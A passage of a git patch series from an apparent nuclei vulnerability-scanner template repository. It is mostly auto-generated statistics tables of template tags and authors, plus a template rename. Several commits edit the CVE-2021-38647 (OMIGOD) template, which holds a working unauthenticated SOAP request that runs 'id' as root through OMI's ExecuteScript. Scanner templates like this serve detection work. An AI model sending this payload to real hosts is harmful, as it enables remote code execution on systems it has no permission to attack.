nordex | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | | jnoj | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | | clockwatch | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | | hortonworks | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | | javamelody | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | | erp-nc | 1 | | | | | | | | | | emby | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| prestashop | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | | kafdrop | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | | mariadb | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | | enumeration | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| camera | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| prestashop | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 18bef8f400..affcdde18b 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 | -| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 | -| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 | -| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 | -| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | | -| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | | -| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | | -| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | | +| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | +| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | +| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | +| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | +| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | +| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | | wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| tech | 101 | gaurang | 42 | workflows | 35 | | | | | +| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | | From a293b4c01b0eee39f1dc11c86a8446394ee6ff12 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Aug 2021 21:35:41 +0000 Subject: [PATCH 1816/4083] Auto Update README [Mon Aug 23 21:35:41 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 05efb37d28..fba79152e9 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 | -| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 | -| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 | -| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 | -| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | | -| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | | -| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | | -| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | | +| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | +| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | +| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | +| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | +| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | +| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | | wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| tech | 101 | gaurang | 42 | workflows | 35 | | | | | +| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | | -**144 directories, 1870 files**. +**146 directories, 1940 files**.
    ([0-9.]+)' \ No newline at end of file + - '>PHP Version <\/td>([0-9.]+)' From 5858e3a01cad8e668f41ca33111bce436d79f108 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 13:33:54 +0530 Subject: [PATCH 2374/4083] Update and rename exposures/logs/database-error.yaml to misconfiguration/database-error.yaml --- {exposures/logs => misconfiguration}/database-error.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {exposures/logs => misconfiguration}/database-error.yaml (92%) diff --git a/exposures/logs/database-error.yaml b/misconfiguration/database-error.yaml similarity index 92% rename from exposures/logs/database-error.yaml rename to misconfiguration/database-error.yaml index d66676e6fd..a1a9c5c1bf 100644 --- a/exposures/logs/database-error.yaml +++ b/misconfiguration/database-error.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Database+Error%22 - tags: exposure,database,debug + tags: misconfig,database requests: - method: GET From e26a1bb759ee26ce5a10a9f235c742a2ce775267 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 17 Sep 2021 13:42:22 +0530 Subject: [PATCH 2375/4083] misc update --- cves/2021/CVE-2021-38647.yaml | 81 ++++++++++++++++++----------------- 1 file changed, 42 insertions(+), 39 deletions(-) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index 9ebc3f374c..ab7069b79b 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -2,10 +2,10 @@ id: CVE-2021-38647 info: name: OMIGOD - Open Management Infrastructure RCE - author: daffainfo - description: Unauthenticated RCE vulnerability in the Open Management Infrastructure by removing authentication header + author: daffainfo,xstp severity: critical - tags: cve,cve2021,rce,omi + tags: cve,cve2021,rce,omi,microsoft + description: Open Management Infrastructure Remote Code Execution Vulnerability reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 @@ -14,48 +14,51 @@ info: - https://github.com/microsoft/omi requests: - - raw: - | POST /wsman HTTP/1.1 - Connection: Keep-Alive - Content-Length: 1505 - Content-Type: application/soap+xml;charset=UTF-8 Host: {{Hostname}} - - - - {{BaseURL}}/wsman/ - http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem - - http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous - - http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand - 102400 - uuid:0AB58087-C2C3-0005-0000-000000010000 - PT1M30S - - - - - root/scx - - - - - id - 0 - - + Content-Type: application/soap+xml;charset=UTF-8 + + + + HTTP://127.0.0.1:5985/wsman/ + http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem + + http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous + + http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript + 102400 + uuid:00B60932-CC01-0005-0000-000000010000 + PT1M30S + + + + + root/scx + + + + + aWQ= + + 0 + true + + - matchers-condition: and matchers: - type: word words: - - "uid=0(root) gid=0(root) groups=0(root)" - part: body - - - type: status - status: - - 200 + - '' + - 'uid=0(root) gid=0(root) groups=0' + condition: and \ No newline at end of file From 728e36a99dfcc34cef6267b3e1432adfbc2aa382 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 17 Sep 2021 13:42:40 +0530 Subject: [PATCH 2376/4083] Update CVE-2021-38647.yaml --- cves/2021/CVE-2021-38647.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index ab7069b79b..dbc79e1595 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -19,7 +19,7 @@ requests: POST /wsman HTTP/1.1 Host: {{Hostname}} Content-Type: application/soap+xml;charset=UTF-8 - + Date: Fri, 17 Sep 2021 14:03:42 +0530 Subject: [PATCH 2377/4083] misc update --- cves/2021/CVE-2021-38647.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index dbc79e1595..7fbede7607 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -29,7 +29,7 @@ requests: xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"> - HTTP://127.0.0.1:5985/wsman/ + HTTP://{{Hostname}}/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous From 4767cd23c3e6fced42048ba2dde4cd047886a9ec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 17 Sep 2021 08:40:24 +0000 Subject: [PATCH 2378/4083] Auto Generated Templates Stats [Fri Sep 17 08:40:24 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1560 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 795 insertions(+), 787 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index e295b164f1..9d08e2481a 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":690},{"name":"lfi","count":250},{"name":"panel","count":248},{"name":"xss","count":227},{"name":"exposure","count":226},{"name":"wordpress","count":207},{"name":"rce","count":195},{"name":"tech","count":169},{"name":"cve2020","count":160},{"name":"wp-plugin","count":140},{"name":"cve2021","count":115},{"name":"cve2019","count":93},{"name":"config","count":93},{"name":"cve2018","count":82},{"name":"joomla","count":74},{"name":"apache","count":68},{"name":"takeover","count":66},{"name":"token","count":65},{"name":"cve2010","count":64},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":51},{"name":"cve2017","count":49},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"","count":36},{"name":"oracle","count":36},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"logs","count":30},{"name":"redirect","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":21},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"router","count":19},{"name":"sap","count":18},{"name":"springboot","count":17},{"name":"debug","count":16},{"name":"cve2014","count":15},{"name":"misconfig","count":15},{"name":"cve2012","count":14},{"name":"cve2011","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"devops","count":13},{"name":"php","count":13},{"name":"dlink","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"dell","count":10},{"name":"aws","count":10},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"intrusive","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"cnvd","count":8},{"name":"ruijie","count":8},{"name":"backup","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"cve2009","count":7},{"name":"cms","count":7},{"name":"google","count":7},{"name":"confluence","count":7},{"name":"vmware","count":7},{"name":"ibm","count":7},{"name":"laravel","count":6},{"name":"cve2008","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"circarlife","count":5},{"name":"jolokia","count":5},{"name":"wp-theme","count":5},{"name":"headless","count":5},{"name":"windows","count":5}